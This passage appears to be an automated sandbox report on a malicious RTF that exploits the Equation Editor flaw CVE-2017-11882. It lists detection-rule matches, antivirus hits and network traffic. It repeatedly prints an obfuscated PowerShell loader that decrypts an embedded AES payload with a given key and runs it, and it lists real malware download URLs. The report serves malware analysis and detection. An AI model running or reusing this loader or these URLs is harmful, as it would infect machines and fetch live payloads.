t/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2188, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , ProcessId: 1568, ProcessName: wscript.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2188, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , ProcessId: 1568, ProcessName: wscript.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2188, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" , ProcessId: 1568, ProcessName: wscript.exe
    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2188, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2120, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2160, TargetFilename: C:\Users\user\AppData\Local\Temp\rydzvwda.q03.ps1
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: e2VMPAayU1.rtfAvira: detected
    Source: http://198.46.176.133/Upload/vbs.jpegAvira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9681AC94-218C-447B-8B38-4F8B3535CB8F}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
    Source: C:\Users\user\Desktop\~WRD0000.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
    Source: http://198.46.176.133/Upload/vbs.jpegVirustotal: Detection: 21%Perma Link
    Source: http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFjVirustotal: Detection: 12%Perma Link
    Source: http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFVirustotal: Detection: 13%Perma Link
    Source: http://198.46.176.133Virustotal: Detection: 17%Perma Link
    Source: e2VMPAayU1.rtfReversingLabs: Detection: 66%
    Source: e2VMPAayU1.rtfVirustotal: Detection: 51%Perma Link

    Exploits

    barindex
    Source: Static RTF information: Object: 0 Offset: 000074CDh
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 172.245.123.11 Port: 80Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
    Source: ~WRF{9681AC94-218C-447B-8B38-4F8B3535CB8F}.tmp.0.drStream path '_1783898628/\x1CompObj' : ...................F....Microsoft Equation 3.0....
    Source: ~WRF{9681AC94-218C-447B-8B38-4F8B3535CB8F}.tmp.0.drStream path '_1783898665/\x1CompObj' : ...................F....Microsoft Equation 3.0....
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: :e.pdbSIL\S source: powershell.exe, 00000006.00000002.454426075.000000000511A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: >:\Windows\System.Management.Automation.pdbpdbion.pdbv source: powershell.exe, 00000006.00000002.453353036.00000000005B3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 6.Core.pdbpeU source: powershell.exe, 00000006.00000002.454426075.000000000511A000.00000004.00000020.00020000.00000000.sdmp

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.176.133:80
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.176.133:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
